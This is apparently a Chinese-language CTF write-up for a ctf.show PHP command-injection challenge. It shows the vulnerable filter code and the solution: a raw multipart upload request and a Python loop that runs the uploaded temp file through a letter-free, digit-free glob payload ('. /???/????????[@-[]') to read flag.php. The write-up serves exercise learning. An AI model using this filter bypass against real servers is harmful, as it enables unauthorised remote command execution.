<?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/// 你们在炫技吗? if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){system($c);} }else{highlight_file(__FILE__); }
POST /?c=.%20/???/????????[@-[] HTTP/1.1 Host: 38e01fc6-12c1-4003-a799-dc74d8c479d8.challenge.ctf.show User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----geckoformboundary98c4d6bac442abbefe0684638924813d Content-Length: 348 Origin: null Connection: close Upgrade-Insecure-Requests: 1 Priority: u=0, i------geckoformboundary98c4d6bac442abbefe0684638924813d Content-Disposition: form-data; name="file"; filename="exp.txt" Content-Type: text/plain#!/bin/sh cat flag.php ------geckoformboundary98c4d6bac442abbefe0684638924813d Content-Disposition: form-data; name="submit"鎻愪氦 ------geckoformboundary98c4d6bac442abbefe0684638924813d--
使用上题后部分的方式
这⾥甚⾄吧数字都给过滤掉了,还有部分的特殊字符 这⾥看南神博客,南神原话 “这次在上⼀题的基础上多过滤掉了数字,导致我们⽆法使⽤上题的payload。
不过之前看过p师傅的⼀篇⽆字⺟数字webshell的⽂章,这⾥我们可以利⽤php的特性:如果我们发送⼀个上传⽂件的post包,php会将我们上传的⽂件保存在临时的⽂件夹下,并且默认的⽂件⽬录是/tmp/phpxxxxxx。⽂件 名最后的6个字符是随机的⼤⼩写字⺟,⽽且最后⼀个字符⼤概率是⼤写字⺟。容易想到的匹配⽅式就是利⽤?进⾏匹配,即???/?????????,然⽽这不⼀定会匹配到我们上传的⽂件,这时候有什么办法呢?
发现可以⽤[]来正则匹配,如???/?????????[A-Z]就能匹配B-Y,于是为了匹配A-Z就可以从@匹 配到[ 然后这⾥有个技巧是使⽤ . 来执⾏⽂件,如创建了⼀个 a.txt,然后⾥⾯写ls shell⾥执⾏ . a.txt,就会执⾏出ls的结果。 于是构造如下:
import requests while True:url = 'http://617464c5-1e4b-4cd8-9ef1-adbb89037d3c.challenge.ctf.show/? c=. /???/????????[@-[]' flag = requests.post(url=url,files={"file":("flag.txt","cat flag.php")} )if("ctf" in flag.text):print(flag.text)break
